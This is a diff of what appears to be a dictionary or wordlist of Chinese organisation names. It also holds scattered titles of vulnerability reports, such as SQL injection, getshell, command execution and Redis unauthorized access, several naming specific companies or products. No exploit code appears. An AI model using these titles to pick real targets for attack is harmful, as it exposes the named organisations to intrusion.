-某硬件设备远程命令执行漏洞4(无需登录) -某硬件设备远程命令执行漏洞5(无需登录) -某硬件设备远程命令执行漏洞6(无需登录) -某硬件设备远程命令执行漏洞7(无需登录) -某硬件设备远程命令执行漏洞8(无需登录) -某硬件设备远程命令执行漏洞9(无需登录) +某硬件设备远程命令执行漏洞10 +某硬件设备远程命令执行漏洞2 +某硬件设备远程命令执行漏洞3 +某硬件设备远程命令执行漏洞4 +某硬件设备远程命令执行漏洞5 +某硬件设备远程命令执行漏洞6 +某硬件设备远程命令执行漏洞7 +某硬件设备远程命令执行漏洞8 +某硬件设备远程命令执行漏洞9 北京金运通投资管理有限公司= 广州智雄软件有限公司某协同OA办公系统一处getshell#1 深圳市中网互联建站系统存在SQL注入 @@ -36110,7 +36140,6 @@ zstu 三明市将乐县教育网络办公系统 三沙国海信通科技发展有限公司 三盛智慧教育科技股份有限公司 -上工申贝(集团)股份有限公司 上汽依维柯红岩商用车有限公司 上汽通用五菱汽车股份有限公司 上海一嗨信息技术服务有限公司 @@ -36128,13 +36157,11 @@ zstu 上海之江生物科技股份有限公司 上海二三四五网络科技有限公司 上海互信金融信息服务有限公司 -上海交通投资(集团)有限公司 上海伊邦医药信息科技有限公司 上海伍贤信息技术股份有限公司 上海优科豪马轮胎销售有限公司 上海优鸿装饰设计工程有限公司 上海保隆汽车科技股份有限公司 -上海信息产业(集团)有限公司 上海信联信息发展股份有限公司 上海健麾信息技术股份有限公司 上海全筑控股集团股份有限公司 @@ -36142,7 +36169,6 @@ zstu 上海冰王生物科技发展有限公司 上海凌云实业发展股份有限公司 上海凯众材料科技股份有限公司 -上海凯泉泵业(集团)有限公司 上海凯赛生物技术股份有限公司 上海凯鑫分离技术股份有限公司 上海创兴资源开发股份有限公司 @@ -36176,6 +36202,7 @@ zstu 上海外国语大学附属外国语学校 上海外滩三号饮食文化有限公司 上海够快网络科技股份有限公司 +上海大众公用事业股份有限公司 上海天呈医流科技股份有限公司 上海天永智能装备股份有限公司 上海安畅网络科技股份有限公司 @@ -36297,7 +36324,6 @@ zstu 上海颢石网络信息科技有限公司 上海飞凯光电材料股份有限公司 上海鸿儒教育信息咨询有限公司 -上海龙头(集团)股份有限公司 上海龙韵传媒集团股份有限公司 上海龙韵广告传播股份有限公司 世纪天鸿教育科技股份有限公司 @@ -36306,7 +36332,6 @@ zstu 东杰智能科技集团股份有限公司 东莞市搜于特服装股份有限公司 东莞市水利勘测设计院有限公司 -中体未来投资(北京)有限公司 中信国安信息产业股份有限公司 中信国安葡萄酒业股份有限公司 中信泰富特钢集团股份有限公司 @@ -36352,7 +36377,6 @@ zstu 中国大地财产保险股份有限公司 中国山东省莱州市政府清单网站 中国建材国际工程集团有限公司 -中国建筑一局(集团)有限公司 中国建筑工业出版社数字图书馆 中国建筑股份有限公司技术中心 中国旅游集团中免股份有限公司 @@ -36414,27 +36438,22 @@ zstu 中建一局集团安装工程有限公司 中建三局第一建设工程有限公司 中建二局第二建筑工程有限公司 -中建新疆建工(集团)有限公司 -中教畅享(北京)科技有限公司 中文天地出版传媒股份有限公司 中智天津人力资源服务有限公司 中核苏阀科技实业股份有限公司 中水珠江规划勘测设计有限公司 中汇国际保险经纪股份有限公司 +中炬高新技术实业股份有限公司 中煤第三建设集团有限责任公司 中物院高性能数值模拟软件中心 中电长城网际系统应用有限公司 中科云网科技集团股份有限公司 中科健康产业集团股份有限公司 中科同昌信息技术集团有限公司 -中科实业集团(控股)有限公司 -中粮地产(集团)股份有限公司 中航工业机电系统股份有限公司 中航航空电子系统股份有限公司 中船重工汉光科技股份有限公司 -中色(宁夏)东方集团有限公司 中芯国际集成电路制造有限公司 -中装新网科技(北京)有限公司 中车长春轨道客车股份有限公司 中远海运特种运输股份有限公司 中远海运能源运输股份有限公司 @@ -36450,7 +36469,7 @@ zstu 乐山中小在线信息服务有限公司 乐山市经济和信息化委员会网站 乐歌人体工学科技股份有限公司 -云丁网络技术(北京)有限公司 +二重集团重型装备股份有限公司 云南临沧鑫圆锗业股份有限公司 云南农业大学农干培训管理系统 云南博闻科技实业股份有限公司 @@ -36461,18 +36480,13 @@ zstu 云南海诚实业集团股份有限公司 云南白药集团中药资源有限公司 云南贡润祥茶产业开发有限公司 -云智易控科技(成都)有限公司 五常市凤凰山农业发展有限公司 亚洲金融合作协会网络金融学院 -京信通信系统(中国)有限公司 +亚翔系统集成科技股份有限公司 京汉实业投资集团股份有限公司 -亮讯国际贸易(上海)有限公司 从化区人民代表大会常务委员会 伊春市雪中王山特产品有限公司 -优估(上海)信息科技有限公司 优彩环保资源科技股份有限公司 -传奇科软科技(北京)有限公司 -传驰网络技术(上海)有限公司 佛山佛塑科技集团股份有限公司 佛山市中旅国际旅行社有限公司 佛山市佰什特通用设备有限公司 @@ -36503,7 +36517,6 @@ zstu 内蒙古自治区社会信用管理中心 冷水江市人力资源与社会保障局 准时达国际供应链管理有限公司 -凡客诚品(北京)科技有限公司 凯迪生态环境科技股份有限公司 分众传媒信息技术股份有限公司 创业黑马科技集团股份有限公司 @@ -36511,7 +36524,6 @@ zstu 利群集团青岛电子商务有限公司 剑河县人民代表大会常务委员会 加佳有色金属金融资产交易平台 -势场信息科技(上海)有限公司 包头东宝生物技术股份有限公司 包头市人民政府办公厅信息中心 北京一骑当千股份科技有限公司 @@ -36677,7 +36689,6 @@ zstu 北京康创安捷信息技术有限公司 北京康拓红外技术股份有限公司 北京建工环境修复股份有限公司 -北京建谊投资发展(集团)公司 北京当升材料科技股份有限公司 北京微课创景教育科技有限公司 北京德法智诚信息科技有限公司 @@ -36768,7 +36779,6 @@ zstu 北京经开投资开发股份有限公司 北京网元圣唐娱乐科技有限公司 北京网御星云信息技术有限公司 -北京联东投资(集团)有限公司 北京联拓天际电子商务有限公司 北京聚智未来科技股份有限公司 北京聚融天下信息技术有限公司 @@ -36810,15 +36820,13 @@ zstu 北方华锦化学工业股份有限公司 北方华锦化学工业集团有限公司 北方导航控制技术股份有限公司 +北方联合出版传媒股份有限公司 华中师范大学科研之友网站漏洞 华夏在线保险代理服务有限公司 华扬联众数字技术股份有限公司 -华拓光研科技(北京)有限公司 华数数字电视传媒集团有限公司 -华映科技(集团)股份有限公司 华测检测认证集团股份有限公司 华润万东医疗装备股份有限公司 -华润置地(北京)股份有限公司 华能湖南岳阳发电有限责任公司 华致酒行连锁管理股份有限公司 华闻传媒投资集团股份有限公司 @@ -36844,6 +36852,7 @@ zstu 南京莱斯信息技术股份有限公司 南京越博动力系统股份有限公司 南京远光广安信息科技有限公司 +南京音飞储存设备股份有限公司 南方双林生物制药股份有限公司 南方电网综合能源股份有限公司 南昌大学医学部办公自动化系统 @@ -36852,7 +36861,6 @@ zstu 南通富士通微电子股份有限公司 南通江山农药化工股份有限公司 南都物业服务集团股份有限公司 -博朗泰华(北京)科技有限公司 博雅生物制药集团股份有限公司 卧龙电气驱动集团股份有限公司 卫宁健康科技集团股份有限公司 @@ -36876,9 +36884,7 @@ zstu 厦门象屿电子商务有限责任公司 厦门醉品春秋网络科技有限公司 厦门金龙汽车集团股份有限公司 -友讯电子设备(上海)有限公司 双鸭山市人力资源和社会保障厅 -可口可乐饮料(上海)有限公司 叶圣陶杯全国中学生新作文大赛 合肥几度互联网络科技有限公司 合肥华美整形美容医院有限公司 @@ -36902,11 +36908,9 @@ zstu 吉林省政府公众信息网服务中心 吉林省聚发财电子商务有限公司 同德县人民代表大会常务委员会 -名创优品(广州)有限责任公司 启迪桑德环境资源股份有限公司 启迪环境科技发展股份有限公司 呼和浩特和林格尔经济信息化局 -品鑫泰供应链(深圳)有限公司 哈尔滨中飞新技术股份有限公司 哈尔滨博实自动化股份有限公司 哈尔滨市人力资源和社会保障局 @@ -36967,6 +36971,7 @@ zstu 四川省自贡市大安区人民检察院 四川空间座标信息科技有限公司 四川红棉投资管理有限责任公司 +四川股权交易中心股份有限公司 四川荣丰科技有限公司广汉在线 四川蜀品天下信息技术有限公司 四川西部资源控股股份有限公司 @@ -36985,6 +36990,7 @@ zstu 国家木薯产业技术体系信息平台 国家林业和草原局科技发展中心 国家测绘地理信息局重庆测绘院 +国家空气质量联网监测管理平台 国家质检总局缺陷产品管理中心 国机通用机械科技股份有限公司 国机重型装备集团股份有限公司 @@ -36992,18 +36998,13 @@ zstu 国泰君安投资管理股份有限公司 国海富兰克林基金管理有限公司 国盛金融控股集团股份有限公司 -国肽生物科技(北京)有限公司 -国药堂大药房(上海)有限公司 国药集团一致药业股份有限公司 -图丰信息(成都)有限责任公司 埃里克森北京管理顾问有限公司 -堆糖信息科技(上海)有限公司 复星联合健康保险股份有限公司 大兴安岭地区网上政务服务中心 大化集团大连化工股份有限公司 大千生态环境集团股份有限公司 大庆物业管理行业监管信息系统 -大彻网络科技(上海)有限公司 大晟时代文化投资股份有限公司 大连东软思维科技发展有限公司 大连华锐重工集团股份有限公司 @@ -37016,8 +37017,6 @@ zstu 大连豪森设备制造股份有限公司 大连龙图信息技术股份有限公司 天夏智慧城市科技股份有限公司 -天天利财科技(北京)有限公司 -天根生化科技(北京)有限公司 天水众兴菌业科技股份有限公司 天津一汽夏利汽车股份有限公司 天津三英精密仪器股份有限公司 @@ -37036,6 +37035,7 @@ zstu 天津富通信息科技股份有限公司 天津富通鑫茂科技股份有限公司 天津市专业技术人员继续教育网 +天津市房地产发展股份有限公司 天津市政企互通服务信息化平台 天津市计量监督检测科学研究院 天津捷强动力装备股份有限公司 @@ -37050,7 +37050,6 @@ zstu 天津长荣科技集团股份有限公司 天涯社区网络科技股份有限公司 天臣国际医疗科技股份有限公司 -天顺风能(苏州)股份有限公司 太原市数字化城乡管理指挥中心 太原易扬众和信息技术有限公司 奇瑞徽银汽车金融股份有限公司 @@ -37060,6 +37059,7 @@ zstu 威海广泰空港设备股份有限公司 媒体播放系统大量用户信息泄露 媒体播放系统目录列表文件读取 +学大教育科技集团股份有限公司 宁夏回族自治区人民政府办公厅 宁夏回族自治区扶贫开发办公室 宁夏宝丰能源集团股份有限公司 @@ -37099,6 +37099,7 @@ zstu 安徽大地熊新材料股份有限公司 安徽学府信息科技股份有限公司 安徽安利材料科技股份有限公司 +安徽安科生物工程股份有限公司 安徽富煌三珍食品集团有限公司 安徽山河药用辅料股份有限公司 安徽广电信息网络股份有限公司 @@ -37121,15 +37122,12 @@ zstu 安徽荃银高科种业股份有限公司 安徽辉隆农资集团股份有限公司 安标国家矿用产品安全标志中心 -安琪电子商务(宜昌)有限公司 安阳化学工业集团有限责任公司 宏和电子材料科技股份有限公司 -宜家电子商务(中国)有限公司 宜宾创享网络科技有限责任公司 宝创管理系统任意文件读取漏洞 -宝贝格子(北京)科技有限公司 -宝驾出行(北京)科技有限公司 -家家乐购(北京)科技有限公司 +宣亚国际品牌管理股份有限公司 +宣亚国际营销科技股份有限公司 宿迁市住房公积金网络查询系统 富士康工业互联网股份有限公司 山东三维石化工程股份有限公司 @@ -37196,7 +37194,6 @@ zstu 巴东县人民政府网网络问政平台 巴彦淖尔市公安局交通警察支队 巴马瑶族自治县人民政府门户网 -布比(北京)网络技术有限公司 常州千红生化制药股份有限公司 常州安全生产监督管理信息系统 常州市文化广电和旅游局弱口令 @@ -37282,7 +37279,6 @@ zstu 广东邦宝益智玩具股份有限公司 广东金刚玻璃科技股份有限公司 广东金马旅游集团股份有限公司 -广东长青(集团)股份有限公司 广东雄塑科技集团股份有限公司 广东顶固集创家居股份有限公司 广东顺威精密塑料股份有限公司 @@ -37383,6 +37379,7 @@ zstu 广西英腾教育科技股份有限公司 广西西江开发投资集团有限公司 康佳集团股份有限公司呼叫中心 +康龙化成新药技术股份有限公司 廊坊市车管所网上预约管理系统 廊坊康华过滤科技有限公司网站 延边朝鲜族自治州人民政府网站 @@ -37394,11 +37391,13 @@ zstu 徐州市经济和信息化委员会网站 徐州科融环境资源股份有限公司 徐工集团工程机械股份有限公司 -微量云商(成都)科技有限公司 德州市卫生计生综合监督执法局 德艺文化创意集团股份有限公司 思南县大数据校园安全管理平台 +思瑞浦微电子科技股份有限公司 思进智能成形装备股份有限公司 +怡球金属资源再生股份有限公司 +恒宇信通航空装备股份有限公司 恒立实业发展集团股份有限公司 恩施州财政局乡镇财政资金监管 恩施市政务服务中心管理办公室 @@ -37462,7 +37461,6 @@ zstu 成都风雨师兄网络科技有限公司 成都鼎族怡品电子商务有限公司 我爱我家控股集团股份有限公司 -托克拉克(北京)科技有限公司 扬州市聚来宝网络科技有限公司 扬州扬杰电子科技股份有限公司 摩登大道时尚集团股份有限公司 @@ -37470,8 +37468,6 @@ zstu 攀钢集团成都投资管理有限公司 攀钢集团重庆钛业股份有限公司 攀钢集团钒钛资源股份有限公司 -收藏天下(北京)网络有限公司 -敏华家具制造(惠州)有限公司 教育实习管理支持平台越权漏洞 新乡市瑞丰新材料股份有限公司 新光海航人寿保险有限责任公司 @@ -37487,13 +37483,13 @@ zstu 新疆北新路桥建设股份有限公司 新疆北新路桥集团股份有限公司 新疆博州人力资源和社会保障网 -新疆友好(集团)股份有限公司 新疆工商注册登记网上办事大厅 新疆拉夏贝尔服饰股份有限公司 新疆汇嘉时代百货股份有限公司 新疆熙菱信息技术股份有限公司 新疆维吾尔自治区高级人民法院 新疆贝肯能源工程股份有限公司 +新疆青松建材化工股份有限公司 新疆鸿图天盛信息科技有限公司 方大锦化化工科技股份有限公司 无线生活北京信息技术有限公司 @@ -37513,7 +37509,6 @@ zstu 无锡雅座在线科技股份有限公司 无锡雪浪环境科技股份有限公司 日日顺物联网信息技术有限公司 -时趣互动(北京)科技有限公司 昆吾九鼎投资控股股份有限公司 昆山佰奥智能装备股份有限公司 昆山沪光汽车电器股份有限公司 @@ -37525,14 +37520,10 @@ zstu 晋能控股山西电力股份有限公司 晨光生物科技集团股份有限公司 景德镇市卫生和计划生育委员会 -晶科绿能(上海)管理有限公司 -月旭科技(上海)股份有限公司 有信达供应链集团股份有限公司 望江县人民代表大会常务委员会 木垒哈萨克自治县政务服务平台 机械科学研究总院集团有限公司 -李宁(中国)体育用品有限公司 -李宁(北京)体育用品有限公司 杨凌本香农业产业集团有限公司 杨凌示范区食品药品监督管理局 杭州万行人力资源服务有限公司 @@ -37574,7 +37565,6 @@ zstu 杭州钱江电气集团股份有限公司 杭州顶点财经网络传媒有限公司 杭州高新橡塑材料股份有限公司 -杰特电子实业(深圳)有限公司 某分类信息系统最新版注入两处 株洲华锐精密工具股份有限公司 格尔木市人民政府信息网管中心 @@ -37764,7 +37754,6 @@ zstu 河南金丹乳酸科技股份有限公司 河南金象客运信息服务有限公司 河南银鸽实业投资股份有限公司 -法务之家(北京)科技有限公司 泰安市扶贫开发领导小组办公室 泰安开创世纪信息技术有限公司 洛阳北方玻璃技术股份有限公司 @@ -37774,7 +37763,6 @@ zstu 派斯双林生物制药股份有限公司 济南亿冠网络技术服务有限公司 济南华联商厦集团股份有限公司 -济南四建(集团)有限责任公司 济南恒誉环保科技股份有限公司 济宁大运河驾驶员培训有限公司 浙报数字文化集团股份有限公司 @@ -37880,7 +37868,6 @@ zstu 海峡金桥财产保险股份有限公司 海波重型工程科技股份有限公司 海航凯撒旅游集团股份有限公司 -海虾企业(控股)股份有限公司 润乾报表系统一处任意文件读取 润乾报表系统存在命令执行漏洞 淄博宽正数码网络科技有限公司 @@ -37938,6 +37925,7 @@ zstu 深圳市房地产中介协会深圳中协 深圳市房多多网络科技有限公司 深圳市斯维尔科技股份有限公司 +深圳市新南山控股股份有限公司 深圳市新国都技术股份有限公司 深圳市新国都支付技术有限公司 深圳市明源云软件服份有限公司 @@ -38013,7 +38001,6 @@ zstu 温州宏丰电工合金股份有限公司 温州职业技术学院成人教育学院 渭南市行政服务中心管理办公室 -港中旅(青岛)海泉湾有限公司 湖北三峡新型建材股份有限公司 湖北东贝机电集团股份有限公司 湖北京山轻工机械股份有限公司 @@ -38070,6 +38057,7 @@ zstu 潜能恒信能源技术股份有限公司 潮州市潮安区住房和城乡建设局 濮阳惠成电子材料股份有限公司 +濮阳濮耐高温材料股份有限公司 烟台东诚药业集团股份有限公司 烟台华东电子软件技术有限公司 烟台张裕葡萄酿酒股份有限公司 @@ -38079,9 +38067,9 @@ zstu 烟台经济技术开发区管理委员会 烟台艾迪精密机械股份有限公司 烟台龙源电力技术股份有限公司 +爱博诺德医疗科技股份有限公司 爱尔眼科医院集团股份有限公司 环球优路教育科技股份有限公司 -环胜电子商务(上海)有限公司 珠海世纪鼎利科技股份有限公司 珠海和佳医疗设备股份有限公司 珠海市斗门区人才交流服务中心 @@ -38097,7 +38085,6 @@ zstu 甘肃陇神戎发药业股份有限公司 白银市文化广播影视新闻出版局 百洋产业投资集团股份有限公司 -盈世信息科技(北京)有限公司 盈峰环境科技集团股份有限公司 盐城市人民代表大会常务委员会 石嘴山市人力资源和社会保障局 @@ -38140,22 +38127,16 @@ zstu 秦皇岛市人力资源和社会保障局 秦皇岛市人民政府政务服务中心 空间信息产业发展股份有限公司 -第四范式(北京)技术有限公司 紫云苗族布依族自治县人民法院 -紫光日东科技(深圳)有限公司 绵阳富临精工机械股份有限公司 绿色动力环保集团股份有限公司 罗克佳华科技集团股份有限公司 罗博特科智能科技股份有限公司 美克国际家居用品股份有限公司 -美利达自行车(山东)有限公司 老百姓大药房连锁股份有限公司 联想智慧医疗信息技术有限公司 -聚光科技(杭州)股份有限公司 -聚诚(深圳)网络科技有限公司 肇庆华锋电子铝箔股份有限公司 胜高连锁酒店管理股份有限公司 -能力天空科技(北京)有限公司 自贡市人民代表大会常务委员会 臺北市私立大同高中全球資訊網 航天宏图信息技术股份有限公司 @@ -38228,7 +38209,6 @@ zstu 西安电子科技大学信息化建设处 西安达刚路面机械股份有限公司 西安通源石油科技股份有限公司 -西山煤电(集团)有限责任公司 西藏城市发展投资股份有限公司 西藏银河科技发展股份有限公司 西部超导材料科技股份有限公司 @@ -38242,6 +38222,7 @@ zstu 贵州省教育厅科研项目管理系统 贵州省绥阳县人口和计划生育局 贵州精英天成科技股份有限公司 +贵州茅台酒厂习酒有限责任公司 贵州长征天成控股股份有限公司 贵阳朗玛信息技术股份有限公司 赛摩智能科技集团股份有限公司 @@ -38252,7 +38233,6 @@ zstu 跨境通宝电子商务股份有限公司 路桥集团国际建设股份有限公司 软通动力信息技术集团有限公司 -辅云电子商务(上海)有限公司 辅仁药业集团制药股份有限公司 辅仁药业集团实业股份有限公司 辽宁曙光汽车集团股份有限公司 @@ -38266,11 +38246,9 @@ zstu 辽宁能源煤电产业股份有限公司 辽宁骄阳信息技术发展有限公司 达州市人民政府法治政府建设网 -达疆网络科技(上海)有限公司 迈得医疗工业设备股份有限公司 运城市农业信息化综合服务平台 远丰电商商城系统短信验证漏洞 -远光信息技术(澳门)有限公司 远光共创智能科技股份有限公司 远大住宅工业集团股份有限公司 连云港国家高新技术产业开发区 @@ -38279,6 +38257,7 @@ zstu 通化金马药业集团股份有限公司 通源石油科技集团股份有限公司 通联支付网络服务股份有限公司 +速伯艾特国际酒店管理有限公司 郑州云龙电子信息技术有限公司 郑州安图生物工程股份有限公司 郑州建业至尊商务服务有限公司 @@ -38286,9 +38265,8 @@ zstu 郑州豫磨精饰机械制造有限公司 郑州高新技术产业开发区规划局 鄂尔多斯市食品药品监督管理局 -酒泉钢铁(集团)有限责任公司 -酷味阳光(北京)商贸有限公司 重庆三峡担保集团股份有限公司 +重庆三峡水利电力股份有限公司 重庆三峰环境集团股份有限公司 重庆农村商业银行股份有限公司 重庆南华中天信息技术有限公司 @@ -38300,15 +38278,12 @@ zstu 重庆市莱得快美食文化有限公司 重庆广播电视大学继续教育学院 重庆建设汽车系统股份有限公司 -重庆德庄实业(集团)有限公司 重庆智飞生物制品股份有限公司 重庆有线电视网络股份有限公司 重庆涪陵电力实业股份有限公司 重庆登康口腔护理用品有限公司 重庆百亚卫生用品股份有限公司 重庆茶语网络信息技术有限公司 -重庆隆鑫地产(集团)有限公司 -金农信达(北京)科技有限公司 金华市金宝通网络科技有限公司 金华春光橡塑科技股份有限公司 金华米粒网络技术服务有限公司 @@ -38318,7 +38293,6 @@ zstu 铁岭新城投资控股股份有限公司 铜陵有色金属集团股份有限公司 铜陵松宝智能装备股份有限公司 -铭智华通科技(北京)有限公司 银邦金属复合材料股份有限公司 锡林郭勒盟外设计划生育委员会 锡林郭勒盟经济和信息化委员会 @@ -38326,7 +38300,6 @@ zstu 镇江市人民代表大会常务委员会 镇江市区电梯困人应急救援平台 镇江市地方海事局公共服务平台 -镜界网络科技(南京)有限公司 长垣县公安局双实管理服务平台 长城国际动漫游戏股份有限公司 长春人才公寓开发管理有限公司 @@ -38335,6 +38308,7 @@ zstu 长春市住房保障和房地产管理局 长春英利汽车工业股份有限公司 长春迪瑞医疗科技股份有限公司 +长春高新技术产业股份有限公司 长江润发健康产业股份有限公司 长沙优学互动信息技术有限公司 长沙先导智慧城市投资有限公司 @@ -38346,11 +38320,11 @@ zstu 阜新德尔汽车部件股份有限公司 阜阳市人民政府法制办公室网站 阳泉市矿区食品药品监督管理局 -阿仁(上海)信息科技有限公司 阿拉善盟人力资源和社会保障厅 陕西中天火箭技术股份有限公司 陕西北元化工集团股份有限公司 陕西宝光真空电器股份有限公司 +陕西广电网络传媒股份有限公司 陕西延长石油化建股份有限公司 陕西建工机械施工集团有限公司 陕西炼石有色资源股份有限公司 @@ -38360,7 +38334,6 @@ zstu 陕西省延安市住房和城乡建设局 陕西省延安市子长县人民检察院 陕西金叶科教集团股份有限公司 -雀氏(福建)实业发展有限公司 雄安科融环境科技股份有限公司 青岛七彩时尚电子商务有限公司 青岛东软载波科技股份有限公司 @@ -38386,7 +38359,6 @@ zstu 青海省水利信息网后台管理系统 青海金瑞矿业发展股份有限公司 鞍山重型矿山机器股份有限公司 -颐月信息技术(北京)有限公司 首航高科能源技术股份有限公司 首都医科大学附属北京友谊医院 首都医科大学附属北京朝阳医院 @@ -38441,14 +38413,13 @@ zstu 广州网软志成信息科技有限公司b2b2c电商平台前台五处sql注入打包 广州网软志成信息科技有限公司b2b2c电商平台前台三处sql注入打包#2 杭州云天软件股份有限公司行业erp管理系统3处sql注入打包dba权限 -杭州云天软件股份有限公司行业erp管理系统又3处sql注入打包dba权限(不同方法) +杭州云天软件股份有限公司行业erp管理系统又3处sql注入打包dba权限 +杭州云天软件股份有限公司行业erp管理系统漏洞 杭州云天软件股份有限公司行业erp管理系统漏洞打包 -杭州云天软件股份有限公司行业erp管理系统某处存在2处sql任意执行(不同方法非注入) +杭州云天软件股份有限公司行业erp管理系统某处存在2处sql任意执行 杭州云天软件股份有限公司行业erp管理系统某处存在sql注入漏洞 -杭州云天软件股份有限公司行业erp管理系统可直接执行sql语句(不同方法,非注入,3处可直接获取查询结果) -杭州云天软件股份有限公司行业erp管理系统漏洞(注入与执行sql)打包 +杭州云天软件股份有限公司行业erp管理系统可直接执行sql语句 杭州云天软件股份有限公司行业erp管理系统存在预设超管帐号可登录getshell -施耐德某产品漏洞打包(二进制exp) 因酷营销系统前台任意文件上传getshell2 因酷营销系统前台任意文件上传getshell3 广州兼职地带市场管理有限公司redis未授权访问 @@ -38456,11 +38427,9 @@ zstu 龙脉科技建站系统某处存在通用sql注入 档案资源智能管理系统一处前台webservice注入 筑巢软件网站建设官网存在存储xss 疑似通用型 -一起走(北京)健康科技有限公司 七台河宝泰隆煤化工股份有限公司 万邦德医药控股集团股份有限公司 三亚带啥儿农业电商发展有限公司 -三节课信息咨询(北京)有限公司 三门峡天云网络技术服务有限公司 上海东方明珠新媒体股份有限公司 上海丽人丽妆化妆品股份有限公司 @@ -38502,7 +38471,6 @@ zstu 上海普利特复合材料股份有限公司 上海晶丰明源半导体股份有限公司 上海晶华胶粘新材料股份有限公司 -上海杏花楼(集团)股份有限公司 上海柯力士信息安全技术有限公司 上海水星家用纺织品股份有限公司 上海永茂泰汽车科技股份有限公司 @@ -38552,7 +38520,6 @@ zstu 中国人民大学创意产业技术研究院 中国人民政治协商会议南平委员会 中国企业社会责任监测和评价系统 -中国全聚德(集团)股份有限公司 中国共产主义青年团信宜市委员会 中国共产主义青年团江西省委员会 中国共产主义青年团辽宁省委员会 @@ -38561,11 +38528,14 @@ zstu 中国共产党石嘴山市委员会宣传部 中国兴业太阳能技术控股有限公司 中国化学工程第十四建设有限公司 +中国北方稀土高科技股份有限公司 中国医院协会药事管理专业委员会 中国南航集团进出口贸易有限公司 中国国家认证认可监督管理委员会 +中国国际海运集装箱股份有限公司 中国开封清明上河园股份有限公司 中国教育和科研计算机网网络中心 +中国气象局综合观测培训实习基地 中国水利水电第七工程局有限公司 中国水利水电第八工程局有限公司 中国汽车工程研究院股份有限公司 @@ -38611,7 +38581,6 @@ zstu 临夏回族自治州人民政府门户网站 临夏市人民政府新闻视频管理系统 临沂新程金锣肉制品集团有限公司 -举贤网科技(北京)股份有限公司 乌兰察布人民政府金融工作办公室 乌兰察布市中小企业公共服务平台 乌海市人民政府信息化工作办公室 @@ -38619,22 +38588,18 @@ zstu 乌鲁木齐市人力资源和社会保障局 乐山市市中区食品药品监督管理局 乐山茂松软件有限公司成都分公司 -乐爱金财产保险(中国)有限公司 云南师范大学商学院公寓管理系统 云南省建设投资控股集团有限公司 +云南鸿翔一心堂药业股份有限公司 人人乐连锁商业集团股份有限公司 -亿爱思(北京)科技股份有限公司 -任我游(厦门)科技发展有限公司 伊春市丰林山特产品有限责任公司 伊春市人民政府网上政务服务中心 -优悠游(北京)旅游投资有限公司 传神语联网网络科技股份有限公司 佛山市佛航物流集团股份有限公司 佛山市南海区食品药品监督管理局 佛山市海天调味食品股份有限公司 佛山市顺德区数码彩涂料有限公司 佛山市顺德区海一鸥电器有限公司 -佰思通办公用品(上海)有限公司 佳木斯市汤原县网上政务服务中心 信阳市公安局出入境网上服务大厅 全国城市农贸中心联合会站群导航 @@ -38652,6 +38617,7 @@ zstu 内蒙古自治区食品药品监督管理局 内蒙古蒙牛乳业集团股份有限公司 内蒙古蒙电华能热电股份有限公司 +内蒙古蒙草生态环境股份有限公司 内蒙古蒙都羊业食品股份有限公司 内蒙古鄂尔多斯资源股份有限公司 农信银资金清算中心有限责任公司 @@ -38661,6 +38627,7 @@ zstu 北京世纪好未来教育科技有限公司 北京世纪维克多文化发展有限公司 北京中企网动力数码科技有限公司 +北京中关村科技发展股份有限公司 北京中欣银宝通支付服务有限公司 北京中科三环高技术股份有限公司 北京中粉网信息技术咨询有限公司 @@ -38719,7 +38686,6 @@ zstu 北京长城金点物联网科技有限公司 北汽蓝谷新能源科技股份有限公司 北自所制造业自动化工程研究中心 -医科达(上海)医疗器械有限公司 华昌达智能装备集团股份有限公司 南京万德斯环保科技股份有限公司 南京万米云电商系统存在逻辑漏洞 @@ -38740,7 +38706,6 @@ zstu 南洋天融信科技集团股份有限公司 南通市检验检测机构公共服务平台 博尔塔拉蒙古自治州行政服务中心 -卫盈联信息技术(深圳)有限公司 厦门印了么信息科技股份有限公司 厦门吉比特网络技术股份有限公司 厦门市美亚柏科信息股份有限公司 @@ -38763,7 +38728,6 @@ zstu 哈尔滨东安汽车动力股份有限公司 哈尔滨新光光电科技股份有限公司 哈尔滨麻雀装饰工程设计有限公司 -哦加哦网络科技(上海)有限公司 嘉兴机动车驾驶培训公众服务平台 四川依米康环境科技股份有限公司 四川合纵药易购医药股份有限公司 @@ -38783,10 +38747,8 @@ zstu 国家开放大学数字化学习资源中心 国家邮政局职业技能鉴定指导中心 国电大渡河流域水电开发有限公司 -坎德拉(深圳)科技创新有限公司 塞力斯医疗科技集团股份有限公司 大兴安岭地区行政公署应急管理局 -大宇宙信息创造(中国)有限公司 大明宫国家遗址公园管理有限公司 大连华信计算机技术股份有限公司 大连工业大学艺术与信息工程学院 @@ -38794,7 +38756,6 @@ zstu 大连美吉姆教育科技股份有限公司 大连高新技术产业园区管理委员会 天津七一二通信广播股份有限公司 -天津劝业场(集团)股份有限公司 天津市公共机构能源在线监测系统 天津市四方欧业液压机械有限公司 天津市基础教育资源公共服务平台 @@ -38807,10 +38768,8 @@ zstu 天津银龙预应力材料股份有限公司 太原市第一建筑工程集团有限公司 太原市食品药品安全质量追溯平台 -好利来食品科技(北京)有限公司 威宁彝族回族苗族自治县人民政府 威海中国旅行社有限公司官方网站 -孩子王儿童用品(中国)有限公司 宁夏新日恒力钢丝绳股份有限公司 宁德时代新能源科技股份有限公司 宁波卡倍亿电气技术股份有限公司 @@ -38843,21 +38802,15 @@ zstu 安徽省通源环境节能股份有限公司 安徽省高层次人综合信息服务平台 安徽鸿路钢结构集团股份有限公司 -宜高美信息服务(成都)有限公司 宝业控股—广通国际投资有限公司 -宝宝树(北京)信息技术有限公司 宝应县有机食品质量监督检验中心 -宝视达眼镜(中国)连锁有限公司 -客如云科技(北京)股份有限公司 宣城市华菱精工科技股份有限公司 宽甸满族自治县综合办公信息系统 宿州市顺天粉体设备制造有限公司 密山市人民政府网上政务服务中心 寿光市网上阳光村务监督管理平台 -尚客圈(北京)文化传播有限公司 尤洛卡精准信息工程股份有限公司 居然之家新零售集团股份有限公司 -展动力人才资讯(中国)有限公司 山东东岳有机硅材料股份有限公司 山东东阿国胶堂阿胶药业有限公司 山东同大海岛新材料股份有限公司 @@ -38947,6 +38900,7 @@ zstu 张家港富瑞特种装备股份有限公司 徐州市高等学校招生委员会办公室 徐州海伦哲专用车辆股份有限公司 +微知库旗下所有网站存在越权漏洞 德华兔宝宝装饰新材股份有限公司 德阳市农村集体三资公开公示平台 怀化市社会信用体系建设领导小组 @@ -38970,14 +38924,10 @@ zstu 成都聚思力信息信息技术有限公司 成都西南财大出版社有限责任公司 抚州市机动车驾驶员培训管理平台 -拓吉凯(天津)职业服饰有限公司 揭阳市榕城区政府办事信息公开网 -支付宝(中国)网络技术有限公司 教育部学位与研究生教育发展中心 